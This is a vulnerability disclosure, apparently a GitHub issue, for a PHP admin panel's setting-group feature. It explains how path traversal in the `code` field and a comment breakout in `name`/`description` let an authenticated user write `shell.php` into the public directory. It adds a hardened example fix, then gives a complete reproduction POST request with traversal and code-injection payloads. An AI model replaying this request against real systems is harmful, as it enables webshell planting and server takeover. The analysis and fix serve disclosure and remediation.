Vulnerability Analysis
The vulnerable code is the `create_setting_file` method in `app/admin/common.php`. Line 125 calls `file_put_contents($path, $file_code);` to write a file, so we work backwards from there and check whether the two parameters, `$path` and `$file_code`, are controllable.
The `$path` parameter is built as shown below: the incoming `$data->code` is concatenated directly into the path of the file to be written:
![image](https://user-images.githubusercontent.com/66706544/155530076-8afa0c13-5263-46f9-a719-74fbca820fb5.png)
The `$file_code` parameter is built as shown below; the relevant part is line 108, where `name` and `description` are also concatenated directly. A comment marker is concatenated in front of them, and we will look later at whether it can be bypassed.
![image](https://user-images.githubusercontent.com/66706544/155530195-5345a6d2-df27-4f6a-8353-bd8b89864093.png)
The `add` method in `app/admin/controller/SettingGroupController.php` calls `create_setting_file` with no further filtering or escaping, so bypassing the comment is simple: close the comment marker before the injected value and open a new one after it.
The resulting malicious file looks like this:
![image](https://user-images.githubusercontent.com/66706544/155530267-3a0981c3-938f-4853-8bfe-2b3a5a2feacb.png)
So a crafted payload can be submitted directly through Development Management -> Settings Configuration -> Setting Group Management; the path traversal then writes a malicious webshell into the `public` directory.
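For comparison, here is how a maintainer would want both inputs handled. This is example code added to this write-up, not the project's own code: the function names, the layout of the generated file, and the settings directory are assumptions. The group code is restricted to an identifier charset before it touches a path, the resolved destination is checked against the intended directory, and the free-text fields are emitted with `var_export()` so they always land inside a PHP string literal rather than inside a comment.

```php
<?php
// Added example (not the project's code): hardened version of the
// setting-file write. Names and file layout are hypothetical.
declare(strict_types=1);

/**
 * Only allow a conservative identifier charset for the group code, so
 * "../", "/", and NUL bytes can never reach the filesystem layer.
 */
function validate_setting_code(string $code): string
{
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $code)) {
        throw new InvalidArgumentException('invalid setting group code');
    }
    return $code;
}

/**
 * Build the generated PHP source. var_export() yields a correctly quoted
 * and escaped PHP literal, so a value such as "*" . "/phpinfo();" stays
 * data and cannot terminate a comment or inject a statement.
 */
function build_setting_file_code(string $name, string $description, string $code): string
{
    $nameLit = var_export($name, true);
    $descLit = var_export($description, true);
    $codeLit = var_export($code, true);
    return "<?php\n"
        . "// Generated setting group file (hypothetical layout).\n"
        . "return [\n"
        . "    'code'        => {$codeLit},\n"
        . "    'name'        => {$nameLit},\n"
        . "    'description' => {$descLit},\n"
        . "];\n";
}

/**
 * Write the file only after confirming the resolved destination is inside
 * the settings directory (defence in depth on top of the charset check).
 */
function create_setting_file_hardened(string $settingDir, string $name, string $description, string $code): string
{
    $code = validate_setting_code($code);
    $baseDir = realpath($settingDir);
    if ($baseDir === false) {
        throw new RuntimeException('settings directory does not exist');
    }
    $path = $baseDir . DIRECTORY_SEPARATOR . $code . '.php';
    // dirname($path) must resolve to exactly $baseDir. With the charset
    // above it always does; the check guards against a relaxed regex later.
    if (realpath(dirname($path)) !== $baseDir) {
        throw new RuntimeException('refusing to write outside settings directory');
    }
    file_put_contents($path, build_setting_file_code($name, $description, $code), LOCK_EX);
    return $path;
}

// Constructed demonstration input, mirroring the shapes seen in the report.
$tmp = sys_get_temp_dir() . '/setting_demo_' . bin2hex(random_bytes(4));
mkdir($tmp, 0700);

// Comment-breakout strings in name/description are stored as plain data.
$file = create_setting_file_hardened($tmp, '*/phpinfo();/*', '*//*', 'demo_group');
$cfg = include $file;
var_dump($cfg['name'] === '*/phpinfo();/*');

// A traversal sequence in the code field is rejected before any path is built.
try {
    create_setting_file_hardened($tmp, 'x', 'y', '../../../public/shell');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

The charset check alone closes the traversal, and `var_export()` alone closes the comment breakout; the `realpath()` comparison is there so that a future change to the allowed characters cannot silently reopen the write-anywhere primitive.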
Vulnerability Reproduction
Under Development Management -> Settings Configuration -> Setting Group Management -> Add, build the payload shown below and click Save; `shell.php` is then written into the `public` directory.
![image](https://user-images.githubusercontent.com/66706544/155530339-8333003f-280a-4d5b-b28b-e5bff0f546de.png)
Request:

```http
POST /admin/SettingGroup/add.html HTTP/1.1
Host: 192.168.3.60:8083
Content-Length: 997
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEHW2gVJUhcSza8yd
Origin: http://192.168.3.60:8083
Referer: http://192.168.3.60:8083/admin/SettingGroup/add.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: AppSId=07d81f216f3f5f3805e2256f4c932291; admin_user_id=1; admin_user_sign=b22e396b1ac2df18b9bcead37f3e002f; device_id_uid_1=1e50ee83f9b8aff2e47b9d172cc892195b49ea98; DarkMode=0; HeaderFixed=0; DropdownLegacyOffset=0; NoBorder=0; SidebarCollapsed=0; SidebarFixed=0; SidebarMini=0; SidebarMiniMd=0; SidebarMiniXs=0; FlatSidebar=0; LegacySidebar=0; CompactSidebar=0; ChildIndentSidebar=0; ChildHideSidebar=0; NoExpandSidebar=0; FootFixed=0; TextSmBody=0; TextSmHeader=0; TextSmBrand=0; TextSmSidebar=0; TextSmFooter=0
Connection: close

------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="module"

admin
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="name"

*/phpinfo();/*
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="description"

*//*
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="code"

../../../public/shell
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="sort_number"

1000
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="icon"

fas fa-list
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="auto_create_menu"

0
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="auto_create_file"

1
------WebKitFormBoundaryEHW2gVJUhcSza8yd
Content-Disposition: form-data; name="__token__"

f5d12a0b26db2bddce591189850d08b5
------WebKitFormBoundaryEHW2gVJUhcSza8yd--
```
Result:
![image](https://user-images.githubusercontent.com/66706544/155530450-50cb813b-41a2-456b-a412-51aa3b5ac4bc.png)